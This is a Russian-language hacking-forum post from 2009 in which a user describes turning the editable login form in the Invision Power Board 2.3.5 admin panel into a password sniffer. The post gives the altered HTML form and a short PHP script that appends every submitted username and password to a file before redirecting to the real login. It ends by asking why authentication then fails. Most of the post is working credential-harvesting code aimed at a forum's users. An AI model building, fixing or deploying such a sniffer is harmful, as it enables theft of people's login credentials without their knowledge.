Форум АНТИЧАТ - Снифер паролей в IPB 2.3.5. Косяк

Снифер паролей в IPB 2.3.5. Косяк

01.02.2009, 20:36

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

Провел на форуме:
1325167

Репутация: 100

Снифер паролей в IPB 2.3.5. Косяк

Косяк такой.
В Админке IPB
НАСТРОЙКИ - Методы авторизации - Список методов - Внутренняя авторизация IPB - Стандартный метод авторизации

Можно изменять html формочку при авторизации.
Я подумал.
Прикинул, что вещь неплохая, можно организовать полуфейк-полуснифер)))))
Вбил в форму следующее:

Код:

<form action="http://127.0.0.1/upload/index.php?act=Login&amp;CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()">
	<input type="hidden" name="referer" value="http://127.0.0.1/upload/index.php?" />
	<div class="borderwrap">
		<div class="maintitle"><img src='style_images/1/nav_m.gif' border='0'  alt='&gt;' width='8' height='8' />&nbsp;Log In</div>
		<div class='row2'>
			<div class="formsubtitle">Please enter your details below to log in</div>
			<div class="errorwrap" style='margin-bottom:0px;padding-bottom:0px'>
				<h4>Attention!</h4>
				<p>You must already have registered for an account before you can log in.<br />If you do not have an account, you may register by clicking the 'register' link near the top of the screen</p>
				<p><b>I've forgotten my password! <a href="http://127.0.0.1/upload/index.php?act=Reg&amp;CODE=10">Click here!</a></b></p>
			</div>
		</div>
		<table class='ipbtable' cellspacing="0">
			<tr>
				<td width="60%" valign="top" class='row2'>
					<fieldset>
						<legend><b>Log In</b></legend>
						<table class='ipbtable' cellspacing="1">
							<tr>

<td width="50%"><b>Enter your user name</b></td>
								<td width="50%"><input type="text" size="25" maxlength="64" name="UserName" /></td>

							</tr>
							<tr>
								<td width="50%"><b>Enter your password</b></td>
								<td width="50%"><input type="password" size="25" name="PassWord" /></td>
							</tr>
						</table>
					</fieldset>
				</td>
				<td width="40%" valign="top" class='row2'>
					<fieldset>
						<legend><b>Options</b></legend>
						<table class='ipbtable' cellspacing="1">
							<tr>
								<td width="10%"><input class='checkbox' type="checkbox" name="CookieDate" value="1" checked="checked" /></td>
								<td width="90%"><b>Remember me?</b><br /><span class="desc">This is not recommended for shared computers</span></td>
							</tr>

<tr>
								<td width="10%"><input class='checkbox' type="checkbox" name="Privacy" value="1" /></td>
								<td width="90%"><b>Log in as invisible</b><br /><span class="desc">Don't add me to the active users list</span></td>
							</tr>

						</table>
					</fieldset>
				</td>
			</tr>
			<tr>
				<td class="formbuttonrow" colspan="2"><input class="button" type="submit" name="submit" value="Log me in" /></td>
			</tr>
			<tr>
				<td class="catend" colspan="2"><!-- no content --></td>
			</tr>
		</table>
	</div>
</form><!--TASK--><img src='http://127.0.0.1/upload/index.php?act=task' border='0' height='1' width='1' alt='' />

Проверил.
Авторизовало успешно

Затем, я поменял

PHP код:


		
			
<form action="http://127.0.0.1/upload/index.php?act=Login&amp;CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()">

На

PHP код:


		
			
<form action="http://127.0.0.1/test.php" method="post" name="LOGIN" onsubmit="return ValidateForm()">

В файле test.php вписано следующее:

PHP код:


		
			
<?PHP

$Login = $_POST['UserName'];

$Pass = $_POST['PassWord'];



$log = fopen("base.php","a+");

fwrite($log,"\n$Login:$Pass \n");

fclose($log);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://127.0.0.1/test/index.php?act=Login&CODE=01'></head></html>";

?>

В процессе тестирования, пароль записался!

НО!
Форума категорически не хотел авторизовывать меня.

В чем может быть проблема?
На файлах права 777.
Пароли записываются.
Но авторизация как таковой нет.
Пишет, неизвестная ошибка, требует повторить данные.